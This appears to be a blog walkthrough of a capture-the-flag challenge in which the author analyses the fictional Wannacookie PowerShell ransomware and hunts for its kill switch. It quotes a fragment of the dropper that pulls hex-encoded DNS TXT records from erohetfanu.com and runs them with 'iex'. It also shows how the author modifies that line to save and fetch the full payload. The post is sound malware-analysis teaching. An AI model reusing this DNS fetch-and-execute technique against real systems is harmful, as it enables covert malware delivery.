{"id":395,"date":"2019-01-17T07:23:25","date_gmt":"2019-01-17T07:23:25","guid":{"rendered":"https:\/\/mrjsec.co.uk\/blog\/?p=395"},"modified":"2019-01-17T07:23:32","modified_gmt":"2019-01-17T07:23:32","slug":"objective-9-3-stop-the-malware","status":"publish","type":"post","link":"https:\/\/mrjsec.co.uk\/blog\/objective-9-3-stop-the-malware\/","title":{"rendered":"<center>Objective 9.3: Stop the Malware<\/center>"},"content":{"rendered":"\n<p style=\"text-align:center\">In this objective, we need to stop the malware!<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"483\" height=\"102\" data-attachment-id=\"396\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-3-stop-the-malware\/capture1-13\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture1-12.png?fit=483%2C102&amp;ssl=1\" data-orig-size=\"483,102\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Capture1\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture1-12.png?fit=483%2C102&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture1-12.png?resize=483%2C102&#038;ssl=1\" alt=\"\" class=\"wp-image-396\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture1-12.png?w=483&amp;ssl=1 483w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture1-12.png?resize=300%2C63&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture1-12.png?resize=482%2C102&amp;ssl=1 482w\" sizes=\"auto, (max-width: 483px) 100vw, 483px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">Once again we are given the same hint from Shinny Upatree.<br>\n&#8220;Sweet candy goodness &#8211; I win! Thank you so much!<br>\nHave you heard that Kringle Castle was hit by new ransomware called Wannacookie?<br>\nSeveral elves reported receiving a cookie recipe Word doc. When opened, a PowerShell screen flashed by, and their files were encrypted.<br>\nMany elves were affected, so Alabaster went to see if he could help out.<br>\nI hope Alabaster watched the PowerShell Malware talk at KringleCon before he tried analysing Wannacookie on his computer.<br>\nAn elf I follow online said he analysed Wannacookie and that it communicates over DNS.<br>\nHe also said that Wannacookie transfers files over DNS and that it looks like it grabs a public key this way.<br>\nAnother recent ransomware made it possible to retrieve crypto keys from memory. Hopefully the same is true for Wannacookie!<br>\nOf course, this all depends on how the key was encrypted and managed in memory. Proper public key encryption requires a private key to decrypt.<br>\nPerhaps there is a flaw in the wannacookie author&#8217;s DNS server that we can manipulate to retrieve what we need.<br>\nIf so, we can retrieve our keys from memory, decrypt the key, and then decrypt our ransomed files.&#8221;<\/p>\n\n\n\n<p style=\"text-align:center\">However, we get two new hints <a href=\"https:\/\/www.wired.com\/2017\/05\/accidental-kill-switch-slowed-fridays-massive-ransomware-attack\/\">link1<\/a> and <a href=\"https:\/\/www.youtube.com\/watch?v=wd12XRq2DNk\">link2<\/a>.<\/p>\n\n\n\n<p style=\"text-align:center\">I was going to say this sounds very similar to <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/wana-decrypt0r-ransomware-outbreak-temporarily-stopped-by-accidental-hero-\/\">this<\/a>.<\/p>\n\n\n\n<p style=\"text-align:center\">Alabaster Snowball also tells us the following.<br>\n&#8220;Erohetfanu.com, I wonder what that means? Unfortunately, Snort alerts show multiple domains, so blocking that one won&#8217;t be effective.<br>\nI remember another ransomware in recent history had a killswitch domain that, when registered, would prevent any further infections.<br>\nPerhaps there is a mechanism like that in this ransomware? Do some more analysis and see if you can find a fatal flaw and activate it!&#8221;<\/p>\n\n\n\n<p style=\"text-align:center\">So, I&#8217;m guessing we need to register the domain with &#8220;Ho Ho Ho Daddy&#8221;, and that&#8217;s it\u2026 I think\u2026 As this is all we get within the terminal <\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"610\" height=\"432\" data-attachment-id=\"397\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-3-stop-the-malware\/capture2-13\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture2-11.png?fit=610%2C432&amp;ssl=1\" data-orig-size=\"610,432\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Capture2\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture2-11.png?fit=610%2C432&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture2-11.png?resize=610%2C432&#038;ssl=1\" alt=\"\" class=\"wp-image-397\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture2-11.png?w=610&amp;ssl=1 610w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture2-11.png?resize=300%2C212&amp;ssl=1 300w\" sizes=\"auto, (max-width: 610px) 100vw, 610px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\"> Also, cool domain logo!<br><\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"1181\" height=\"352\" data-attachment-id=\"398\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-3-stop-the-malware\/capture3-13\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture3-12.png?fit=1181%2C352&amp;ssl=1\" data-orig-size=\"1181,352\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Capture3\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture3-12.png?fit=700%2C209&amp;ssl=1\" src=\"https:\/\/i1.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture3-12.png?fit=700%2C209&amp;ssl=1\" alt=\"\" class=\"wp-image-398\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture3-12.png?w=1181&amp;ssl=1 1181w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture3-12.png?resize=300%2C89&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture3-12.png?resize=768%2C229&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture3-12.png?resize=700%2C209&amp;ssl=1 700w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">So, Erohetfanu.com isn&#8217;t the answer (It was worth a shot!)<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"597\" height=\"348\" data-attachment-id=\"399\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-3-stop-the-malware\/capture4-13\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture4-12.png?fit=597%2C348&amp;ssl=1\" data-orig-size=\"597,348\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Capture4\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture4-12.png?fit=597%2C348&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture4-12.png?resize=597%2C348&#038;ssl=1\" alt=\"\" class=\"wp-image-399\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture4-12.png?w=597&amp;ssl=1 597w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture4-12.png?resize=300%2C175&amp;ssl=1 300w\" sizes=\"auto, (max-width: 597px) 100vw, 597px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">We need to go back one and revisit that PowerShell script was able to get from the word file, and we need to relook at the <a href=\"https:\/\/pastebin.com\/raw\/GtzuxYW3\">code<\/a> again!<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"1534\" height=\"182\" data-attachment-id=\"400\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-3-stop-the-malware\/capture5-12\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture5-11.png?fit=1534%2C182&amp;ssl=1\" data-orig-size=\"1534,182\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Capture5\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture5-11.png?fit=700%2C83&amp;ssl=1\" src=\"https:\/\/i1.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture5-11.png?fit=700%2C83&amp;ssl=1\" alt=\"\" class=\"wp-image-400\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture5-11.png?w=1534&amp;ssl=1 1534w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture5-11.png?resize=300%2C36&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture5-11.png?resize=768%2C91&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture5-11.png?resize=700%2C83&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture5-11.png?w=1400&amp;ssl=1 1400w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">We have the code here, but the code seems to be short as it downloads data over DNS and runs it from memory using PowerShell. I wonder if we can get a full version of this PowerShell script?<\/p>\n\n\n\n<p style=\"text-align:center\">Now let&#8217;s look at the last part of this script &#8220;-Name &#8220;$i.$f.erohetfanu.com&#8221; -Type TXT).strings}; iex($(H2A $h | Out-string))&#8221; the very last part prints out the output of the &#8220;H2A $h&#8221; maybe we can change this, so it outputs to a file.<br>\nAlso, remove &#8220;iex&#8221; as explained in the last one, removing &#8220;iex&#8221; makes the script\u2026 Somewhat harmless.<br>\n&#8220;The Invoke-Expression cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command.&#8221; (https:\/\/docs.microsoft.com\/en-us\/powershell\/module\/microsoft.powershell.utility\/invoke-expression?view=powershell-6)<\/p>\n\n\n\n<p style=\"text-align:center\">Now we should have this &#8220;-Type TXT).strings}; ($(H2A $h | Out-File \/home\/mrj\/Documents\/test.text))&#8221; (This will save to my Documents folder, change as you see fit!)<\/p>\n\n\n\n<p style=\"text-align:center\">\u2026\u2026\u2026.So we get an error! <\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"1908\" height=\"219\" data-attachment-id=\"401\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-3-stop-the-malware\/capture6-11\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture6-10.png?fit=1908%2C219&amp;ssl=1\" data-orig-size=\"1908,219\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Capture6\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture6-10.png?fit=700%2C80&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture6-10.png?fit=700%2C80&amp;ssl=1\" alt=\"\" class=\"wp-image-401\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture6-10.png?w=1908&amp;ssl=1 1908w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture6-10.png?resize=300%2C34&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture6-10.png?resize=768%2C88&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture6-10.png?resize=700%2C80&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture6-10.png?w=1400&amp;ssl=1 1400w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">&#8220;The term &#8216;Resolve-DnsName&#8217; is not recognised&#8221; On Linux PowerShell, there is no support for &#8220;Resolve-DnsName&#8221; function yet.<br>\nSo. I guess it&#8217;s Back to Windows!<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"995\" height=\"207\" data-attachment-id=\"402\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-3-stop-the-malware\/capture7-9\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture7-8.png?fit=995%2C207&amp;ssl=1\" data-orig-size=\"995,207\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Capture7\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture7-8.png?fit=700%2C146&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture7-8.png?fit=700%2C146&amp;ssl=1\" alt=\"\" class=\"wp-image-402\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture7-8.png?w=995&amp;ssl=1 995w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture7-8.png?resize=300%2C62&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture7-8.png?resize=768%2C160&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture7-8.png?resize=700%2C146&amp;ssl=1 700w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">Moreover, now get this file.<br>\n<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"1897\" height=\"502\" data-attachment-id=\"403\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-3-stop-the-malware\/capture8-9\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture8-8.png?fit=1897%2C502&amp;ssl=1\" data-orig-size=\"1897,502\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Capture8\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture8-8.png?fit=700%2C185&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture8-8.png?fit=700%2C185&amp;ssl=1\" alt=\"\" class=\"wp-image-403\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture8-8.png?w=1897&amp;ssl=1 1897w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture8-8.png?resize=300%2C79&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture8-8.png?resize=768%2C203&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture8-8.png?resize=700%2C185&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture8-8.png?w=1400&amp;ssl=1 1400w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">However, as you can see, it&#8217;s still not the full version of the script. We need to go deeper. Deeper!<\/p>\n\n\n\n<p style=\"text-align:center\">Looking back at the script, do you notice the long numbers? &#8216;77616E6E61636F6F6B69652E6D696E2E707331&#8217; well this is Hex, let&#8217;s use this website (http:\/\/www.unit-conversion.info\/texttools\/hexadecimal\/) and see what &#8216;77616E6E61636F6F6B69652E6D696E2E707331&#8217; means in text.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"995\" height=\"207\" data-attachment-id=\"402\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-3-stop-the-malware\/capture7-9\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture7-8.png?fit=995%2C207&amp;ssl=1\" data-orig-size=\"995,207\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Capture7\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture7-8.png?fit=700%2C146&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture7-8.png?fit=700%2C146&amp;ssl=1\" alt=\"\" class=\"wp-image-402\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture7-8.png?w=995&amp;ssl=1 995w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture7-8.png?resize=300%2C62&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture7-8.png?resize=768%2C160&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture7-8.png?resize=700%2C146&amp;ssl=1 700w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">So &#8216;77616E6E61636F6F6B69652E6D696E2E707331&#8217; = wannacookie.min.ps1, this is the mini version.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"380\" height=\"476\" data-attachment-id=\"404\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-3-stop-the-malware\/capture9-6\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture9-5.png?fit=380%2C476&amp;ssl=1\" data-orig-size=\"380,476\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Capture9\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture9-5.png?fit=380%2C476&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture9-5.png?resize=380%2C476&#038;ssl=1\" alt=\"\" class=\"wp-image-404\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture9-5.png?w=380&amp;ssl=1 380w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture9-5.png?resize=239%2C300&amp;ssl=1 239w\" sizes=\"auto, (max-width: 380px) 100vw, 380px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">And wannacookie.ps1 = &#8216;77616e6e61636f6f6b69652e707331&#8217;.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"423\" height=\"491\" data-attachment-id=\"405\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-3-stop-the-malware\/capture10-6\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture10-5.png?fit=423%2C491&amp;ssl=1\" data-orig-size=\"423,491\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Capture10\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture10-5.png?fit=423%2C491&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture10-5.png?resize=423%2C491&#038;ssl=1\" alt=\"\" class=\"wp-image-405\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture10-5.png?w=423&amp;ssl=1 423w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture10-5.png?resize=258%2C300&amp;ssl=1 258w\" sizes=\"auto, (max-width: 423px) 100vw, 423px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">So, if we change the ps1 script from &#8216;77616E6E61636F6F6B69652E6D696E2E707331&#8217; to &#8216;77616e6e61636f6f6b69652e707331&#8217; then it should download the script we need!<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"994\" height=\"198\" data-attachment-id=\"406\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-3-stop-the-malware\/capture11-4\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture11-3.png?fit=994%2C198&amp;ssl=1\" data-orig-size=\"994,198\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Capture11\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture11-3.png?fit=700%2C139&amp;ssl=1\" src=\"https:\/\/i1.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture11-3.png?fit=700%2C139&amp;ssl=1\" alt=\"\" class=\"wp-image-406\" 